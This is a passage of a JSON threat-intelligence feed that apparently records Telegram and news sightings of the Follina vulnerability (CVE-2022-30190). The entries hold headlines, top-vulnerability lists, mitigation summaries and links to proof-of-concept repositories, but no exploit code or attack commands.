(CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. 
Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T07:00:36.000000Z"}, {"uuid": "380edc6a-f074-454e-8992-d047edf8b892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/package_security/17", "content": "\u200b\ud83c\udfc6 \u0418\u0442\u043e\u0433\u0438 \u0433\u043e\u0434\u0430\n\n\u041d\u0430\u0441\u0442\u0430\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0435.\n2\u043a22 \u0433\u043e\u0434 \u043d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043a \u043a\u043e\u043d\u0446\u0443, \u0430 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043f\u043e\u0440\u0430 \u043f\u043e\u0434\u0432\u043e\u0434\u0438\u0442\u044c \u0438\u0442\u043e\u0433\u0438.\n\n\u0423 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u043e\u0432, \u043a\u0430\u043a \u0438 \u0432\u0441\u0435\u0433\u0434\u0430, \u0438\u0442\u043e\u0433\u0438 \u0441\u0432\u043e\u0438. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0422\u041e\u041f-10 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 2022 \u0433\u043e\u0434\u0443 \u043f\u043e \u0432\u0435\u0440\u0441\u0438\u0438 Cyber Threat Intelligence:\n\n1. Follina (CVE-2022-30190) \n\n2. Log4Shell (CVE-2021-44228) \n\n3. Spring4Shell (CVE-2022-22965) \n\n4. F5 BIG-IP (CVE-2022-1388) \n\n5. 
Google Chrome zero-day (CVE-2022-0609) \n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882) \n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040) \n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352) \n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134) \n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u043e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u044b, \u0431\u0435\u0440\u0435\u0433\u0438\u0442\u0435 \u0441\u0435\u0431\u044f \u0438 \u0432\u0430\u0448\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u044b.\nP.S. \u041d\u0438\u0436\u0435 \u0435\u0441\u0442\u044c \u043f\u0438\u043a\u0447\u0430 \u0441 \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u044b\u043c\u0438 \u0438\u043a\u043e\u043d\u043a\u0430\u043c\u0438\n\n#\u041f\u043e\u043b\u0435\u0437\u043d\u043e\u0435\n\n\u041f\u0430\u043a\u0435\u0442 \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438", "creation_timestamp": "2022-12-16T15:56:36.000000Z"}, {"uuid": "1ee52878-4384-4108-a270-fe5ef7bf490e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12590", "content": "Latest news and stories from BleepingComputer.com\nXFiles info-stealing malware adds support for Follina delivery\n\nThe XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. [...]", "creation_timestamp": "2022-06-30T14:49:53.000000Z"}, {"uuid": "3c1cde3b-0369-456e-97a5-778c2b490edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/malwarehunters/524", "content": "\u2757\ufe0f\u0412 2022 \u0433. 
\u0442\u0440\u043e\u044f\u043d WoodyRAT \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Microsoft Word \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-30190 \u00abFollina\u00bb, HTM-\u043b\u043e\u0430\u0434\u0435\u0440 \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0434\u043e\u043c\u0435\u043d \u0441 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0435\u0439 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e DNS \u0432 \u0437\u043e\u043d\u0435 .duckdns.org\n\n\ud83d\udccc \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 - \u0432 \u043c\u043e\u0435\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438\n\n\ud83d\udcca Dashboard \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 &amp; \n\ud83d\udcd1 \u041e\u0442\u0447\u0435\u0442\u044b \u043f\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f\u043c\n\n\ud83d\udc26 \u0415\u0436\u0435\u0434\u043d\u0435\u0432\u043d\u044b\u0435 \u043e\u0442\u0447\u0435\u0442\u044b \u0432 Twitter\n\n\ud83d\udd11 #report #woodyrat", "creation_timestamp": "2022-10-13T08:18:14.000000Z"}, {"uuid": "06f58099-fc14-4ee5-82e3-ae15b1733243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2478", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMitigation for 
CVE-2022-30190\nURL\uff1ahttps://github.com/k508/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-10T00:25:13.000000Z"}, {"uuid": "796a807e-345d-401c-a499-9d9987645d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/kasperskyb2b/786", "content": "\u2705 \u0413\u043b\u0430\u0432\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: \u043e\u0442\u0447\u0451\u0442 CISA \u0438 \u0438\u0445 \u0430\u043d\u0433\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u0441\u043e\u044e\u0437\u043d\u0438\u043a\u043e\u0432\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0433\u043e\u0434\u0430 \u0432\u044b\u0445\u043e\u0434\u044f\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u043e\u0442\u0447\u0451\u0442\u043e\u0432, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 2022 \u0433\u043e\u0434, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u2014 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 12 \u043c\u0435\u0441\u044f\u0446\u0435\u0432, \u043d\u043e \u0432 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043e\u043d\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u0443\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u043d\u044b. 
\u041d\u0430\u0447\u043d\u0451\u043c \u0441 \u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u043e\u0442\u0447\u0451\u0442\u0430 \u00ab\u043f\u044f\u0442\u0438\u0433\u043b\u0430\u0437\u044b\u0445\u00bb, \u043f\u043e\u0441\u0432\u044f\u0449\u0451\u043d\u043d\u043e\u0433\u043e \u0433\u043b\u0430\u0432\u043d\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \n\n\u0413\u043b\u0430\u0432\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u043d\u0435 \u043d\u043e\u0432 \u2014 \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f 0day \u0438\u043b\u0438 1day. \u042d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0433\u043e\u0434 \u0438\u043b\u0438 \u0434\u0432\u0430, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 PoC \u043d\u0430 Github, \u0434\u0430\u0432\u043d\u043e \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0435 \u043f\u0430\u0442\u0447\u0430\u043c\u0438, \u043d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u043b\u0438\u043a\u0432\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0442\u044b\u0441\u044f\u0447\u0430\u043c\u0438 \u0441\u0438\u0441\u0430\u0434\u043c\u0438\u043d\u043e\u0432 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.  
\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043d\u0435 \u043d\u0440\u0430\u0432\u0438\u0442\u0441\u044f \u0442\u0440\u0443\u0434\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043d\u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u0447\u0438\u0442\u0430\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445, \u0438\u043c\u0435\u044e\u0449\u0438\u0445 \u0432\u0441\u0435\u043c\u0438\u0440\u043d\u043e\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0432\u043e \u0432\u0441\u0435\u0445 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u044f\u0445.\n\n\u0422\u043e\u043f-12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: CVE-2018-13379 \u0432 Fortinet SSL VPN, \u0442\u0440\u0438 CVE 2021 \u0433\u043e\u0434\u0430, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0435 ProxyShell, CVE-2021-40539 \u0432 Zoho ManageEngine, CVE-2021-26084 \u0438 -26134 \u0432 Confluence, CVE-2021-44228 Log4Shell, CVE-2022-22954 \u0438 -22960 \u0432 VMWare, CVE-2022-1388 \u0432 F5 BIG-IP,  CVE-2022-30190 \u0432 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0442\u0435\u0445\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 Windows, MSDT.\n\n\u0415\u0449\u0451 \u0442\u0440\u0438 \u0434\u0435\u0441\u044f\u0442\u043a\u0430 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u2014 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u043c \u043e\u0442\u0447\u0451\u0442\u0435 (\u0430\u043d\u0433\u043b). 
\u0422\u0430\u043c \u0436\u0435 \u0434\u0430\u043d\u044b \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c \u043f\u043e \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u044b:\n\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u0430\u044f \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430 \u0441\u0435\u0442\u0438\n\ud83d\udd18\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0441\u043e\u0432\u0435\u0442\u044b @\u041f2\u0422", "creation_timestamp": "2023-08-07T10:20:52.000000Z"}, {"uuid": "36636268-e5eb-430d-a52f-f85f846f2422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/76482", "content": "BSidesKC 2022 \u2013 Grant Shanklin\u2019s \u2018Trouble With The Troubleshooter; A Primer On CVE-2022-30190\u2019\n\nhttps://ift.tt/CemSbOE", "creation_timestamp": "2022-11-18T22:46:41.000000Z"}, {"uuid": "b47dabe1-b6fb-4d25-962f-5515b60d08aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/53234", "content": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction\n\nhttps://ift.tt/Wjha3VU", "creation_timestamp": "2022-06-06T10:26:35.000000Z"}, {"uuid": "da579da7-39b3-4c9e-8235-f410be24c2d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/53233", "content": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction\n\nhttps://ift.tt/Wjha3VU", "creation_timestamp": "2022-06-06T10:26:33.000000Z"}, {"uuid": "b57897e8-9c5d-490a-b73d-df79649096b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/Al5s1pu9DlCNMnH7rJt2q5NFKP_tt6i0TJLpRuR3HfdnDhA", "content": "", "creation_timestamp": "2022-12-05T04:24:48.000000Z"}, {"uuid": "7a010773-5369-4fb9-867e-ef40e4ad1f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/52923", "content": "Malware \u2013 new OFFICE MSDT based attack CVE-2022-30190\n\nhttps://ift.tt/EP42lVq", "creation_timestamp": "2022-05-31T16:31:42.000000Z"}, {"uuid": 
"a8b5c22e-6431-4dfa-9b81-77846de69edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/754", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 314 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-29T14:42:00.000000Z"}, {"uuid": "846c29e0-b64a-4f63-bd37-45f15083ed5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/i9m6HRrazEdv2yYTfO5Vg9Qrfq03-5aNzHdOckuUq5U3HrY", "content": "", "creation_timestamp": "2023-07-17T14:40:27.000000Z"}, {"uuid": "a36b01df-bcd7-40d8-b5d3-cbf59ca39e50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/886", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 317 entries related to CVE-2022-30190. 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-02T03:03:57.000000Z"}, {"uuid": "1cdd15ce-d096-4e5d-9fed-ad739ec8394c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/suSVZ8gjh9CeURgOUMEZq2Z7fyo2iknJlY7RsYX9Hr2cvtw", "content": "", "creation_timestamp": "2023-01-20T07:08:40.000000Z"}, {"uuid": "efea7d6f-7a5b-42f4-8ed5-5790f2d2daef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/1161", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 317 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-04T08:56:35.000000Z"}, {"uuid": "4fa9fc92-1642-468d-9448-62a0e14b761f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/177", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 308 entries related to CVE-2022-30190. 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.971670000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-13T21:02:30.000000Z"}, {"uuid": "08e9c547-d5a9-4392-949e-6edfc61c4ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/wireshark_hacking/771", "content": "Thorough MSDT 0-Day CVE-2022-30190 POC 'Follina'", "creation_timestamp": "2022-11-02T06:14:32.000000Z"}, {"uuid": "bcd6cfb0-950c-4773-8d10-0b1b937a03b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/637", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 315 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-28T12:29:25.000000Z"}, {"uuid": "2f68a12c-cd12-4a9c-bc70-018e615a7365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/Wo1sKu5WvLAnXgcdD3UnX1YZbL6JSQKu1r91lLadtAvpOaI", "content": "", "creation_timestamp": "2025-02-07T10:00:05.000000Z"}, {"uuid": "961cb6bf-2893-4117-87b5-15d528134838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/VXX-UF1kIj_skcNHogz47Ob3F5rZG8tp8QVvD5iXH84fvqE", "content": "", "creation_timestamp": "2022-05-31T10:14:55.000000Z"}, {"uuid": "b70d1ebd-f7fb-4933-93ab-8bd938c3762f", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/jjC-UMEvYm9WMdGwqx44S7y31oKWh_aFrkGisTJDTDGmWg", "content": "", "creation_timestamp": "2022-06-01T03:13:13.000000Z"}, {"uuid": "660e8fb1-e175-41d0-9fd8-e08b4415a060", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/PWf_vvG2Dns7xyv3p7orI9OcjbHcz0BpT-pBWPuIwftS1-g", "content": "", "creation_timestamp": "2025-03-02T16:00:09.000000Z"}, {"uuid": "b029f195-91fd-4226-9588-39bda60ed9e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/PFczZxou3M8bxtA_ogzzcgh7g-AmtdGPjCcJVMEUDXCS9Y4", "content": "", "creation_timestamp": "2025-04-08T17:00:08.000000Z"}, {"uuid": "f081c6a2-9db3-45d3-a3ee-e63238145c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/BABATATASASA/5554", "content": "CVE-2022-30190 - Security Update Guide - Microsoft - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", "creation_timestamp": "2023-10-05T19:33:27.000000Z"}, {"uuid": "a55b9f11-e98a-4b83-8161-b293201f634c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/nemeZ1da_ru/5466", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 
\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb (Windows Search) \u2014 CVE-2022-30190. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043e\u043a\u043d\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0435\u0441\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c. \u0410 \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \u043e\u043a\u043d\u043e, \u0436\u0435\u0440\u0442\u0432\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 Microsoft \u2014 MSDT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 